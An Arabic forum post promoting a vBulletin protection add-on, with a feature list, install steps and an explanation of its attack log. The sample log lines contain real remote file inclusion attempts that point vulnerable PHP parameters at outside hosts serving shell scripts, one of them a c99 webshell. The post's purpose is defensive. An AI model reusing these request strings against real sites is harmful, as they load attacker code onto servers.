منتج حماية المنتديات i.s.s.w v 4.1.1 الرهيب

اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا

نطلب الدعاء لنا في التوفيق وثبات الايمان
اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني

[b]
[b]

[b] عمل الهاك : حماية المنتدى بشكل كامل بعون الله

[b]
[b]
[b]
[b]

[b]هذه الصورة تم اعادة تحجيمها . الحجم الافتراضي لها هو 646x502.

[b]
[b] الخيار الاول : لتشغيل حمايه المنتدي

[b] منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

[b] منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

[b] حجب عدة مواقع تساعد على العبث في المنتديات

[b] تطوير للدوال القديمة للتوافق معه السيرفر

[b] منع اكثر اوامر اليونكس وحيل الحقن في الشيل

[b] اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك

[b] الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع

[b]
[b] الان نأتي للقسم الاكثر اثارة للموضوع

[b] عند دخولك مجلد sec

[b] افتح الملف logfile_hacker.txt

[b] ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل

[b] كود PHP:
2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?,
libwww-perl/5.808
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808

[b]2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)

[b] الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

[b] طبعا الفاصلة تفصل بين كل معلومه ومعلومة

[b] كود PHP:
,

[b] التاريخ والوقت
كود PHP:
2007-12-11, 05:50:44,

[b]
[b] عدد المحاولات
كود PHP:
1197370244

[b] ايبي الموقع المصااب
كود PHP:
209.67.223.188

[b] الاصابة طبعا تشفرت لاغراض امنيه
كود PHP:
p=11575//codebb/lang_select

[b] الاستغلال
كود PHP:
?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?

[b] نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه
كود PHP:
libwww-perl/5.808

[b]
[b] الان شرح التركيب

[b] امسح جميع هاكات لها علاقه في الحمايه او منع xss

[b] اما من ركب هاك الحمايه issw v4.0 issw v3

[b] عليه فقط حذف ملف البرودكت

[b] وتركيب المحدث

[b]
[b] شرح حذف الهاك

[b]
[b] من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

[b] ومن ثم حذف توابعه

[b] ---------------------------------------------------------------------------
التركيب
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل

[b] ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt

[b] وارفع cpnav_issw
داخل

[b] قوم باستدعاء البروديكت من لوحت تحكم المنتدي

[b] واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور

[b] مع
تحيات الفريق الامني

[b] الان من لوحت تحكم المنتدي قم برفع البرودكت

[b]
[b] تم تجربت المنتج على الاصدار

[b]
[b]
[b] 3.7.0

[b]
[b] لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت

[b] يطرحه هنا في الموضوع لنصل لتطوير اكثر

[b]
[b] وجل من لا يخطأ وشكرا لكم vb\includes\xml 3.6.x upload
[b]
[b]

[b] الحمد لله على كل شيء

[b] لابري ذمتي عند نزع الحقوق تحصل مشاكل للقواعد اي تغير في سطر الحقوق

وهذا وانا افصح لكم عشان محدا يلومني مثل ماصار فيكم في الاصدار الاسبق

[b] اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه

وشكرا لكم

[b]
[b]منقول


التحميل

[b] باسورد فك الضغط المعتاد

[b][b][b]www.sohph.com[/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b]